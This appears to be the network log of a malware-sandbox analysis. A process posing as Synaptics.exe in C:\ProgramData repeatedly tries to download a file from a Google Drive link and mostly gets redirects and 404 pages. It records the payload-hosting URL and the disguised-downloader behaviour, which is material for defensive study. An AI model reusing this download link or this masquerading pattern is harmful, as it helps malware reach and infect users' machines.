                                                                                                                                                                            2024-12-30 10:49:30 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:31 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC7G726QDmTYQMO3q9MSuerIbwfTO9Hl74vBRJVaUUN86zt8mb-ywPAce78x2T0RjPm4
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:30 GMT
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-Ga9R7AHblNJFnJ1BhWw0Kw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
                                                                                                                                                                            2024-12-30 10:49:31 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                            2024-12-30 10:49:31 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 7a 43 68 46 75 36 6b 73 56 65 49 65 69 6a 55 2d 38 48 73 42 38 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                                            Data Ascii: t Found)!!1</title><style nonce="zChFu6ksVeIeijU-8HsB8w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                            2024-12-30 10:49:31 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                            Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            72192.168.2.849829142.250.185.1614437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:31 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            73192.168.2.849830142.250.185.784437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:31 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            74192.168.2.849831142.250.185.784437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:31 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            75192.168.2.849832142.250.185.1614437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:31 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            76192.168.2.849834142.250.185.784437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:32 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:32 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:32 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-i35PBjV45Tf8xuqUA1TwDw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            77192.168.2.849836142.250.185.784437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:32 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:32 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:32 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-FNsG9wrFxdhPNuhaCddtMw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            78192.168.2.849839142.250.185.784437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:33 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:33 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:33 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-7jgVi0sWWTIrmAiHOYGBCw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            79192.168.2.849840142.250.185.1614437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:33 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:33 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC5qRgu0OBmV649NRheTdxp1c7CZxKLs9ShCrSLyizh0rNK2IEjHV1_v1tIigC3VSbvC
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:33 GMT
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-MsE6aHpBxO2S3j0qbQiqIA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
                                                                                                                                                                            2024-12-30 10:49:33 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                            2024-12-30 10:49:33 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4f 4d 59 66 7a 5a 78 67 41 34 58 62 42 62 5f 4f 70 67 57 76 61 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                                            Data Ascii: t Found)!!1</title><style nonce="OMYfzZxgA4XbBb_OpgWvaw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                            2024-12-30 10:49:33 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                            Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            80192.168.2.849838142.250.185.1614437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:33 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:33 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC7t0WD-bpPbivLYDUpzxuLMsvMCOYihjejscmkEaQcdN8OatQACHG-1eDbV8pL7RzBceCgvVg0
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:33 GMT
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-PL36cXIvHzcvqTRvFaVzrg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
                                                                                                                                                                            2024-12-30 10:49:33 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                                            2024-12-30 10:49:33 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 69 78 37 68 50 2d 58 36 73 75 6d 6f 71 75 44 5f 32 62 4e 36 6c 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                                            Data Ascii: 404 (Not Found)!!1</title><style nonce="ix7hP-X6sumoquD_2bN6lw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
